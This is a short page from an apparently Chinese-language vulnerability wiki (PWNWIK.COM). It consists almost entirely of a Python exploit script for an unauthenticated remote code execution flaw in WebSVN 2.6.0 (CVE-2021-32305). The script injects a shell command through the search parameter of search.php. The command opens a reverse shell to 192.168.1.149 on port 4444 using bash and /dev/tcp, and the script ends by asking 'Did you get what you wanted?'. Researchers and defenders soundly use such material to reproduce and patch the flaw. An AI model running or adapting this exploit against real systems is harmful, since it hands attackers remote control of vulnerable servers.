PWNWIK.COM
,
漏洞影响
Version: 2.6.0
EXP
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated) # Date: 20/06/2021 # Exploit Author: g0ldm45k # Vendor Homepage: https://websvnphp.github.io/ # Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0 # Version: 2.6.0 # Tested on: Docker + Debian GNU/Linux (Buster) # CVE : CVE-2021-32305 import requests import argparse from urllib.parse import quote_plus PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'" REQUEST_PAYLOAD = '/search.php?search=";{};"' parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.') parser.add_argument('target', type=str, help="Target URL.") args = parser.parse_args() if args.target.startswith("http://") or args.target.startswith("https://"): target = args.target else: print("! Target should start with either http:// or https://") exit() requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD))) print("* Request send. Did you get what you wanted?")
PWNWIK.COM==免费、自由、人人可编辑的漏洞库